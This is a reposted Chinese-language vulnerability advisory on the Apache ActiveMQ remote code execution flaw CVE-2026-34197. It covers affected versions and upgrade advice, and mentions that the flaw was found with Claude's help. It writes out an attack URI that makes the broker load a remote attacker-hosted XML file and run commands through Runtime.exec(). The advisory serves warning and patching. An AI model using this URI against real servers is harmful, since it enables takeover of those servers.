【已复现】漏洞预警|ApacheActiveMQ远程代码执行漏洞(CVE-2026-34197)

admin
admin
admin
0
文章
0
评论
2026-04-13 06:48:25 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: ApacheActiveMQ存在远程代码执行漏洞CVE-2026-34197,攻击者可通过Jolokia接口构造恶意URI触发SpringXML外部实体加载,导致服务器权限被接管。影响5.19.4之前版本和6.0.0-6.2.2版本,目前PoC已公开。建议立即升级至5.19.4或6.2.3安全版本。 综合评分: 85 文章分类: 漏洞预警,漏洞分析,WEB安全,应用安全,解决方案

cover_image

【已复现】漏洞预警 | Apache ActiveMQ 远程代码执行漏洞(CVE-2026-34197)

原创

Josh Josh

银河哈希

2026年4月8日 19:51 辽宁

漏洞概述

        Apache ActiveMQ 是 Apache 软件基金会旗下一款经典、开源的 Java 消息中间件(消息队列),完全遵循 JMS 1.1 规范,支持 OpenWire、STOMP、MQTT、AMQP、WebSocket 等多种通信协议,可对接 Java、Python、C++、.NET 等多语言客户端,提供点对点、发布 / 订阅两种核心消息模型,内置消息持久化、事务、主从高可用、集群(Broker 网络)等企业级能力,常用于传统企业应用(ERP/CRM)的系统解耦、异步处理、流量削峰与异构系统集成,是 Java 生态中历史悠久、成熟稳定的消息通信解决方案。

        近日,银河哈希通过安全监测发现 Apache ActiveMQ 存在Apache ActiveMQ 远程代码执行漏洞(CVE-2026-34197)。CVE-2026-34197 源于 ActiveMQ Classic 在 Jolokia JMX-HTTP 桥接接口(/api/jolokia/)对 MBean 操作的输入校验不足。认证攻击者(多数场景需账号密码,部分 6.0.x 版本因 CVE-2024-32114 可未认证)可通过 Jolokia 调用 org.apache.activemq:type=Broker 的 addNetworkConnector 操作,传入构造的 static:(vm://rce?brokerConfig=xbean:http://attacker-url/payload.xml) 格式 URI。ActiveMQ 的 VM 传输层解析该 URI 时,会通过 Spring 的 ResourceXmlApplicationContext 远程加载攻击者控制的 XML 配置文件,实例化其中恶意 Bean(如通过 MethodInvokingFactoryBean 调用 Runtime.exec()),最终以 ActiveMQ 进程权限在目标服务器执行任意系统命令。并且值得注意的是,该漏洞的挖掘者 Naveen Sunkavally 表示,此漏洞仅通过与 Claude 进行十分钟对话便成功挖掘出来。

| | | | — | — | | 漏洞编号 | CVE-2026-34197 | | 漏洞类型 | 代码执行漏洞 | | 漏洞评分 | 8.8 | | 漏洞等级 | 高危 | | 影响组件 | Apache ActiveMQ | | 利用成熟度 | PoC已公开 | | 利用难度 | 低 |

影响范围

  • Apache ActiveMQ Broker(org.apache.activemq:activemq-broker)5.19.4 之前的版本
  • Apache ActiveMQ Broker(org.apache.activemq:activemq-broker)6.0.0 至 6.2.2 版本(6.2.3 之前的 6.x 版本)
  • Apache ActiveMQ(org.apache.activemq:activemq-all)5.19.4 之前的版本
  • Apache ActiveMQ(org.apache.activemq:activemq-all)6.0.0 至 6.2.2 版本(6.2.3 之前的 6.x 版本)

漏洞复现

银河哈希已成功复现该漏洞。

Apache ActiveMQ 远程代码执行漏洞(CVE-2026-34197)

解决方案

官方现已发布安全版本,请立即升级至 5.19.4 或 6.2.3 安全版本。

参考文献

https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt

10 Minutes with Claude: Remote Code Execution in Apache ActiveMQ (CVE-2026-34197)

大连银河哈希安全技术科技有限公司成立于2022年,公司初创团队源于国内知名战队ChaMd5安全团队组建,曾获2023年大连市“连盾”演练第二名及各地市优秀攻击队,并获得多地网信办、经侦支队及应急保障中心感谢信,也服务多家CTF厂商举办赛事。

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:银河哈希 Josh Josh《【已复现】漏洞预警 | Apache ActiveMQ 远程代码执行漏洞(CVE-2026-34197)》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0